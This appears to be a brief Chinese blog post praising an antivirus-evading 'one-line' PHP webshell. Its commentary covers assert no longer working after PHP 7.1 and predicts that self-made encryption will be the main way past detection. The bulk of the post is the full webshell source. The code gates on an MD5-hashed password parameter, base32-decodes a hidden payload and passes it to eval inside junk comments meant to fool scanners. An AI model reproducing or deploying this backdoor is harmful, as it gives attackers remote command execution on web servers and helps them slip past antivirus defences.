security - 一句话免杀 php webshell anti-virus virustotal.com
访问量: 369
这个简直太强大了
一直以来我以为无法过是因为 eval 的原因, 看了很多免杀,都是使用assert
php 7.1 以后就无法使用assert 了。
所以看起来还是没问题的。
估计以后 使用自行加密、解密的方式是绕过的主流
<?php class PLRN{ public $DLUG = null; public $FVRE = null; function __construct(){ if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){ $this->DLUG = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy'; $this->FVRE = @XGAV($this->DLUG); @eval("/*M]Eq[%e*/".$this->FVRE."/*M]Eq[%e*/"); } } } new PLRN(); function NXUM($NHML){ $BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567'; $DTSE = ''; $v = 0; $vbits = 0; for ($i = 0, $j = strlen($NHML); $i < $j; $i++){ $v <<= 8; $v += ord($NHML[$i]); $vbits += 8; while ($vbits >= 5) { $vbits -= 5; $DTSE .= $BASE32_ALPHABET[$v >> $vbits]; $v &= ((1 << $vbits) - 1);}} if ($vbits > 0){ $v <<= (5 - $vbits); $DTSE .= $BASE32_ALPHABET[$v];} return $DTSE;} function XGAV($NHML){ $DTSE = ''; $v = 0; $vbits = 0; for ($i = 0, $j = strlen($NHML); $i < $j; $i++){ $v <<= 5; if ($NHML[$i] >= 'a' && $NHML[$i] <= 'z'){ $v += (ord($NHML[$i]) - 97); } elseif ($NHML[$i] >= '2' && $NHML[$i] <= '7') { $v += (24 + $NHML[$i]); } else { exit(1); } $vbits += 5; while ($vbits >= 8){ $vbits -= 8; $DTSE .= chr($v >> $vbits); $v &= ((1 << $vbits) - 1);}} return $DTSE;} ?>